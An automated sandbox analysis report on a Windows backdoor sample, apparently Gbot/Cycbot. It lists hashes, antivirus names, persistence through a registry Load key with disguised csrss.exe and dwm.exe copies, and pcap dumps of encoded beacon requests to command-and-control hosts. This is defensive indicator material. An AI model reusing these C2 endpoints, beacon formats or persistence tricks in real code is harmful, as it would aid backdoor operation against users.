Analysis Date2014-06-15 21:01:04
MD5bd20e738e880e730f0be210471dd3a91
SHA11ba9e6574e10a92e04f847b46131ef05530a3426

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: c868214bc51735b1f14e4ad29f7cb031 sha1: 0f9bf14f2b0ec5c077a77c4b6f5aa3b357e1f1ba size: 120832
Section.tls md5: 4984f7e85d061a96d5863e52547f2986 sha1: a86ba2fa95527e29267482055aef6dacff03678a size: 1024
Section.data md5: 7bd220564461c331bb82abb10bd39fd6 sha1: 33d3be570ad81a0b5a5e4a1d5af17e2a4325d3ad size: 75264
Section.reloc md5: 85a13e4ced8b736f61afc5aa73d1d92e sha1: bfab7b3d24e84bacd824a1e6e350d25671707b52 size: 1024
Timestamp2005-09-01 06:05:38
PEhasha294f09591d5d96e85d2e116a703f230a88d7cc4
IMPhashcdd26f2da21baca388af07543e2cfa2c
AV360 SafeGen:Heur.Conjar.5
AV360 SafeGen:Heur.Conjar.5
AVAd-AwareGen:Heur.Conjar.5
AVAd-AwareGen:Heur.Conjar.5
AVAlwil (avast)Cybota [Trj]
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)no_virus
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Goolbot.K.gen!Eldorado
AVAuthentiumW32/Goolbot.K.gen!Eldorado
AVAvira (antivir)TR/Crypt.XPACK.Gen8
AVAvira (antivir)TR/Crypt.XPACK.Gen8
AVCA (E-Trust Ino)Win32/FakeAlert.J!generic
AVCA (E-Trust Ino)Win32/FakeAlert.J!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVTrojan.Gbot-453
AVClamAVTrojan.Gbot-453
AVDr. WebBackDoor.Gbot.70
AVDr. WebBackDoor.Gbot.70
AVEmsisoftGen:Heur.Conjar.5
AVEmsisoftGen:Heur.Conjar.5
AVEset (nod32)Win32/Kryptik.SRP
AVEset (nod32)Win32/Kryptik.SRP
AVFortinetW32/Kryptik.SMY!tr.bdr
AVFortinetW32/Kryptik.SMY!tr.bdr
AVFrisk (f-prot)W32/Goolbot.K.gen!Eldorado (generic, not disinfectable)
AVFrisk (f-prot)W32/Goolbot.K.gen!Eldorado (generic, not disinfectable)
AVF-SecureGen:Heur.Conjar.5
AVF-SecureGen:Heur.Conjar.5
AVGrisoft (avg)Win32/Cryptor
AVGrisoft (avg)Win32/Cryptor
AVIkarusBackdoor.Win32.Agent
AVIkarusBackdoor.Win32.Agent
AVKasperskyBackdoor.Win32.Gbot.odl
AVKasperskyBackdoor.Win32.Gbot.odl
AVMalwareBytesBackdoor.Bot
AVMalwareBytesBackdoor.Bot
AVMcafeeBackDoor-EXI.gen.n
AVMcafeeBackDoor-EXI.gen.n
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Heur.Conjar.5
AVMicroWorld (escan)Gen:Heur.Conjar.5
AVNormanwin32/Gbot.AX
AVNormanwin32/Gbot.AX
AVRisingTrojan.Win32.Generic.12959C8E
AVRisingTrojan.Win32.Generic.12959C8E
AVSophosMal/FakeAV-IS
AVSophosMal/FakeAV-IS
AVSymantecBackdoor.Trojan
AVSymantecBackdoor.Trojan
AVTrend MicroBKDR_CYCBOT.SME3
AVTrend MicroBKDR_CYCBOT.SME3
AVVirusBlokAda (vba32)BScope.DeadCryptor.01597

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝
C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Mutex{4D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates Mutex{5A92A751-F926-4BB9-872E-BEC4A4CD571F}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{5D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates Mutex{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSregsysonline.com
Winsock DNS127.0.0.1
Winsock DNSjapanesegreenteaonline.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Network Details:

DNSjapanesegreenteaonline.com
Type: A
173.247.248.36
DNSzonedg.com
Type: A
208.73.211.165
DNSzonedg.com
Type: A
208.73.211.168
DNSzonedg.com
Type: A
208.73.211.175
DNSzonedg.com
Type: A
208.73.210.215
DNSzonedg.com
Type: A
208.73.210.218
DNSzonedg.com
Type: A
208.73.211.165
DNSzonedg.com
Type: A
208.73.211.168
DNSzonedg.com
Type: A
208.73.211.175
DNSzonedg.com
Type: A
208.73.210.215
DNSzonedg.com
Type: A
208.73.210.218
DNSregsysonline.com
Type: A
HTTP GEThttp://japanesegreenteaonline.com/assets/images/greentea-cha-1.gif?v96=9&tq=gHZutDyMv5rJeTfia9nrmsl6giWz%2BJZbVyA%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1lX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJsX%2BSNxFKv975Xlm5G
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1lX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxFKv975Xlm5G
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1lX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1lX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJsX%2BSNzFKv975Xlm5G
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1lX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJtX%2BSNxFKv975Xlm5G
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1lX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxVKv975Xlm5G
User-Agent: mozilla/2.0
Flows TCP192.168.1.1:1031 ➝ 173.247.248.36:80
Flows TCP192.168.1.1:1033 ➝ 208.73.211.165:80
Flows TCP192.168.1.1:1034 ➝ 208.73.211.165:80
Flows TCP192.168.1.1:1035 ➝ 208.73.211.165:80
Flows TCP192.168.1.1:1036 ➝ 208.73.211.165:80
Flows TCP192.168.1.1:1037 ➝ 208.73.211.165:80
Flows TCP192.168.1.1:1038 ➝ 208.73.211.165:80

Raw Pcap
0x00000000 (00000)   47455420 2f617373 6574732f 696d6167   GET /assets/imag
0x00000010 (00016)   65732f67 7265656e 7465612d 6368612d   es/greentea-cha-
0x00000020 (00032)   312e6769 663f7639 363d3926 74713d67   1.gif?v96=9&tq=g
0x00000030 (00048)   485a7574 44794d76 35724a65 54666961   HZutDyMv5rJeTfia
0x00000040 (00064)   396e726d 736c3667 69577a25 32424a5a   9nrmsl6giWz%2BJZ
0x00000050 (00080)   62567941 25334420 48545450 2f312e30   bVyA%3D HTTP/1.0
0x00000060 (00096)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000070 (00112)   6f73650d 0a486f73 743a206a 6170616e   ose..Host: japan
0x00000080 (00128)   65736567 7265656e 7465616f 6e6c696e   esegreenteaonlin
0x00000090 (00144)   652e636f 6d0d0a41 63636570 743a202a   e.com..Accept: *
0x000000a0 (00160)   2f2a0d0a 55736572 2d416765 6e743a20   /*..User-Agent: 
0x000000b0 (00176)   6d6f7a69 6c6c612f 322e300d 0a0d0a     mozilla/2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   316c5825 32425039 68253242 49307344   1lX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 79253242 636f4a73   OhLgjh88y%2BcoJs
0x000000c0 (00192)   58253242 534e7846 4b763937 35586c6d   X%2BSNxFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6564 672e636f 6d0d0a55   t: zonedg.com..U
0x000000f0 (00240)   7365722d 4167656e 743a206d 6f7a696c   ser-Agent: mozil
0x00000100 (00256)   6c612f32 2e300d0a 436f6e74 656e742d   la/2.0..Content-
0x00000110 (00272)   4c656e67 74683a20 300d0a43 6f6e6e65   Length: 0..Conne
0x00000120 (00288)   6374696f 6e3a2063 6c6f7365 0d0a0d0a   ction: close....
0x00000130 (00304)                                         

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   316c5825 32425039 68253242 49307344   1lX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 464d6525 3242636f   OhLgjh%2FMe%2Bco
0x000000c0 (00192)   4a755825 3242534e 78464b76 39373558   JuX%2BSNxFKv975X
0x000000d0 (00208)   6c6d3547 20485454 502f312e 310d0a48   lm5G HTTP/1.1..H
0x000000e0 (00224)   6f73743a 207a6f6e 6564672e 636f6d0d   ost: zonedg.com.
0x000000f0 (00240)   0a557365 722d4167 656e743a 206d6f7a   .User-Agent: moz
0x00000100 (00256)   696c6c61 2f322e30 0d0a436f 6e74656e   illa/2.0..Conten
0x00000110 (00272)   742d4c65 6e677468 3a20300d 0a436f6e   t-Length: 0..Con
0x00000120 (00288)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000130 (00304)   0d0a203c 703e4e6f 20737563 68206669   .. <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   316c5825 32425039 68253242 49307344   1lX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 42537225 32466525   OhLgjh88BSr%2Fe%
0x000000c0 (00192)   32425635 5a755267 25334425 33442048   2BV5ZuRg%3D%3D H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a207a   TTP/1.1..Host: z
0x000000e0 (00224)   6f6e6564 672e636f 6d0d0a55 7365722d   onedg.com..User-
0x000000f0 (00240)   4167656e 743a206d 6f7a696c 6c612f32   Agent: mozilla/2
0x00000100 (00256)   2e300d0a 436f6e74 656e742d 4c656e67   .0..Content-Leng
0x00000110 (00272)   74683a20 300d0a43 6f6e6e65 6374696f   th: 0..Connectio
0x00000120 (00288)   6e3a2063 6c6f7365 0d0a0d0a 72633d22   n: close....rc="
0x00000130 (00304)   696e7465 726e6574 2e676966 223e0a20   internet.gif">. 
0x00000140 (00320)   203c2f62 6f64793e 0a3c2f68 746d6c3e    </body>.</html>
0x00000150 (00336)   0a                                    .

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   316c5825 32425039 68253242 49307344   1lX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683873 47253242 636f4a73   OhLgjh8sG%2BcoJs
0x000000c0 (00192)   58253242 534e7a46 4b763937 35586c6d   X%2BSNzFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6564 672e636f 6d0d0a55   t: zonedg.com..U
0x000000f0 (00240)   7365722d 4167656e 743a206d 6f7a696c   ser-Agent: mozil
0x00000100 (00256)   6c612f32 2e300d0a 436f6e74 656e742d   la/2.0..Content-
0x00000110 (00272)   4c656e67 74683a20 300d0a43 6f6e6e65   Length: 0..Conne
0x00000120 (00288)   6374696f 6e3a2063 6c6f7365 0d0a0d0a   ction: close....
0x00000130 (00304)   0d0a203c 703e4e6f 20737563 68206669   .. <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   316c5825 32425039 68253242 49307344   1lX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 79253242 636f4a74   OhLgjh88y%2BcoJt
0x000000c0 (00192)   58253242 534e7846 4b763937 35586c6d   X%2BSNxFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6564 672e636f 6d0d0a55   t: zonedg.com..U
0x000000f0 (00240)   7365722d 4167656e 743a206d 6f7a696c   ser-Agent: mozil
0x00000100 (00256)   6c612f32 2e300d0a 436f6e74 656e742d   la/2.0..Content-
0x00000110 (00272)   4c656e67 74683a20 300d0a43 6f6e6e65   Length: 0..Conne
0x00000120 (00288)   6374696f 6e3a2063 6c6f7365 0d0a0d0a   ction: close....
0x00000130 (00304)   696e7465 726e6574 2e676966 223e0a20   internet.gif">. 
0x00000140 (00320)   203c2f62 6f64793e 0a3c2f68 746d6c3e    </body>.</html>
0x00000150 (00336)   0a                                    .

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   316c5825 32425039 68253242 49307344   1lX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 464d6525 3242636f   OhLgjh%2FMe%2Bco
0x000000c0 (00192)   4a755825 3242534e 78564b76 39373558   JuX%2BSNxVKv975X
0x000000d0 (00208)   6c6d3547 20485454 502f312e 310d0a48   lm5G HTTP/1.1..H
0x000000e0 (00224)   6f73743a 207a6f6e 6564672e 636f6d0d   ost: zonedg.com.
0x000000f0 (00240)   0a557365 722d4167 656e743a 206d6f7a   .User-Agent: moz
0x00000100 (00256)   696c6c61 2f322e30 0d0a436f 6e74656e   illa/2.0..Conten
0x00000110 (00272)   742d4c65 6e677468 3a20300d 0a436f6e   t-Length: 0..Con
0x00000120 (00288)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000130 (00304)   0d0a203c 703e4e6f 20737563 68206669   .. <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.


Strings
.~
WW
.M[
r..

080904b0
1.0.0.1
1509
FileVersion
&find
&Find any        Alt+F
PrivateBuild
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
<<<<<<<<<<<<<<<<<<<
<<<<<<<<<<<<<<<<<<<<<
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
=========
            
 @( `(
______
____________
______!!!!!!!!!!!!!!!!!
;;;;;;
;;;;;;;;;
;;;;;;;;;;
/////////////
......
...............
''''''''''
((((((((((((((((((((((((((((((((((((((((((((
((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((
))))))))
]]]]]]]]
]]]]]]]]]]]]]]]]]]]]]]]]]]
{{{{!!!!!!!
$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$
*************
**************
*****************
***************************------------
\\\\\\\\\\\\\\\\\\\
&&&&&&&&&&&&&&
&&&&&&&&&&&&&&&
++++++++
00x,Qy
0.>Mr6L
0u?a2}
-	%14]ma
1R:tMi
1WdY[n
@2hI9a
`(@ `3
@ "`@3
+3* @=#
 34X8R
37)Dh4%3D
!{3:8 
`@}3i)
3\R)EV
@@;3T_<
`/4.` 0
4444444
4 }A}g
4aL|AL'[I;
;4F?Zn
;4#+M>
>#@5^(
`5^P%cd
>>666666
69qb$9i
#6Gc8od
6'~zfM>
&:73*X
77																																							
777777
7777777
777777777777777777777777777777777777777777
77777777777bbbbbb
7APW5X
7aY]b<
7F*``L
7_kfFY/E
!7=>'V
8(  2;
8<gF	"p5
  8k	nT
8-qjhH.x
8&qu"c'!s_
@])9_|
9$ >b^E
9~Ed3,
*` 9#o
. `9vX
A3bP9o3
a3ZWCV
A"`@8$ 
aa*************************************
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ADVAPI32.dll
ae<n`0
Afb8K|
AHvi@I
a~I?l"
`AOf?*
aQ,@`a
`?AQsa
ATMUzJ
AVW5eW
BBBBBBBB$$$$$$$$$$$$$$$
bbbbbbbbbb
b*ct$kg7
<B=?eB
B~h#2d
b+OB',
BoYH7O
BV$@`)!8
c  `0f)
}C9[9!
ccccccc
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
;\=CcF
cEXT. 
Ch(C@L}
CM:1#$  
CnI_`~C1[
><cPZ<
Cqw	0+n
CreateProcessA
CsyY]O
cWl~IO
<}cZKJ
 -+/D#
d06y';
d0JKPN
d?`5ZIP
'\D~8e
#dAT )
@.data
dET] "t
De" `Y
dgYlUv
dI(``Xz
d&l8Gh
>dNAe`:
 &``Dq
/'Dy%Z
``\DZ. 
dZaq|%
dzM#	-
e4n5OH
E/5jT?
,` E$  9
e^a1`\
ecXE|s
 @e#d\OC+
eeeeeeeeeeeeeeeeeeeeeeeee
eeeeeeeeeeeeeeeeeeeeeeeeeeeeee
e`@	$f
`@eFdhH
e'Fp3g
e$KTP"`
,%>Em{N
`#}'en
EnumResourceNamesW
eQMA*`
E`r9v@t
e@TZGm
f9~sUa
fAy((W*}
%fD<~\G
fffffffff
FFFFFFFFFFFFFFFFFFFFFF
fh7NI.
F;Hk,`
f]J];)
>%fmDV
`fRG}K
-fV*3]
@ =g	$
G4pt9_sFF%
$g,A+? 
gCVb|!m
GetSystemTimeAsFileTime
GGGGGGGGG
""ggggggggggg
ggggrrrrrrrrrrrrrrrrrrrrrrrrrrr
;G[G'p6
GK\sJR
g&  %N{
g"PujE1
?[GSq0
G$#UVB
=g!vWE:6
*{h1Vbb
`@?H:7
Heh.dll
HEhjS0
HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH
` h^[INL9
&@ HLZ
-hN/wU
` \{hp
?hV~5?
Hwtzyi
Hx~]Ds,
i(1,O^wf}U6
iD?eH{|
i?DEI 
)))))III
IKZ_0%
IM*8Qm
I)MaV:
InterlockedExchange
`iPHrG
iTR/_;
i&USZo 
~i"\,y
 #&` j
J& `/=
J1VBsV
j9i/u*
>JB4&``
jjAOmtm
JJJJJJJJJJdddddd{{{{{{{]]]]]
jjjjjjjjjjjjjjjj
jjjjjjjjjjjjjjjjjjjjjj
>{jW+}`Yp]
?J*>X|
jx-_R/.<
")K`1G
K5|G,@
]k6,<&
ka)BES
.'k<Bq
%KdA^'3x
KERNEL32.dll
KI& `9
kkkkkkkk88888888888888888888888888888888888
KKKKKKKKKKK
kkkkkkkkkkkk
kkkkkkkkkkkkkkkk
KKKKKKKKKKKKKKKKKKK
kkkkkkkkkkkkkkkkkkkkkkkkkkkkkk
kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk
`@kMSW[
Kn#8^*
(  kuY;
KWHTS2
&l8HcR
>:L=8X
l9"  v
;L}BXh
lEqouk
liGwK&
LocalAlloc
lstrlenA
'lXZ]$
`M1\>0d6
\M;5[*
/m^`B[
M'f%{sg
M[INP6
............MMM
MPRAPI.dll
MprConfigGetFriendlyName
MprConfigServerConnect
MprConfigServerDisconnect
MultiByteToWideChar
NdrFixedArrayFree
+Nf%Bp'!
nnnnnnnnnnnnnnnnnnnnnn
@nn{Tg
, @Npj,
n$@@%Q
"@@nsU
NUG/Hz2"
N	U%Z?
@oa?'X|
 <!%OF
OfXq3z
;OgL$@`
OiNAu#;
+o[NuYu
ooooooooo
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
OpenWaitableTimerW
@Oq?Y7
OX-j<#
p)<"@`
>P#1g>
p2A4et
p3SLTRW
 `p4e	,
PathFileExistsW
P|kOJ[
PPPPPPPPPPPPPkkkkkkkkkkkkkk
pppppppppppppppppppppppp
PR)PqY
+'ptAU
q5<& `d
Q]8 "u
Q#9 U_
q	G?~;
*`@Qj8V
QkB|4P
QLzjAd2
Q@Mu	1
*>Qnz,
_q!:Uf
r~2#_W
 $r8mp
RaiseException
r-CPCC
RegCloseKey
RegCreateKeyExA
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyA
RegOpenKeyExA
RegQueryValueExA
RegSetValueExA
.reloc
@Rh3Pi
~rHMJ]
RoO&@@VH
RPCRT4.dll
RRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR
rY/YN]
( @	S*
S	42q5
saVWF#
s`F{, 
 !'s]f9
/s?FX\
SHLWAPI.dll
'}sJq*
